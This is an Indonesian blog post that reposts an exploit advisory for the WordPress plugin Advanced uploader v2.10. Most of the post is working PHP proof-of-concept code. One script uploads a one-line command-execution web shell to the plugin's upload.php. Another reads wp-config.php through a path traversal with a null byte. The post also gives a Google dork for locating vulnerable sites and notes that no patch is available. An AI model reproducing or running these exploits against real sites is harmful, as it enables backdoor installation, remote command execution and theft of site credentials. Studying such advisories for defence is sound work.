Flash Go
» » » » WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities

WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities

WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities - Hallo sahabat Minato ET, Pada Artikel yang anda baca kali ini dengan judul WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel File Upload, Artikel Multiple, Artikel Wordpress, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities
link : WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities

Baca juga


WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities


#-Title: WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities
#-Author: KedAns-Dz
#- E-mail : ked-h (@hotmail. com)
#-Date: 05/12/15
#-Link Download : wordpress. org/plugins/advanced-uploader/
#-Google Dork: inurl:wp-content/plugins/advanced-uploader/
#-Tested on : Windows, Linux
#-Fixed in : ??
////////////////////////////////////////////////////////////////////////////////////////////

Description : 
Wordpress plugin Advanced uploader v2.10 is suffer from multiple vulnerabilities remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files.

Solution:

Currently, we are not aware of any vendor-supplied patches.

-- Proof Of Concept --

File Upload :
<?php
// page : upload.php
// lines : 1030... 1037

$postData = array();
$postData['file'] = "@3xploi7.php";
/* 3xploi7.php : <?php system($_GET["dz"]); ?> */
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http:/[localcrot].com/wp-content/plugins/advanced-uploader/upload.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

File Download :
<?php
// page : upload.php
// lines : 1219... 1237

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$[target].com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>






Demikianlah Artikel WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities

Sekianlah artikel WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel lainnya.

Anda sekarang membaca artikel WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities dengan alamat link https://minatoet.blogspot.com/2015/12/wordpress-plugin-advanced-uploader-v210.html

0 Response to "WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities"

Post a Comment

Subscribe to: Post Comments (Atom)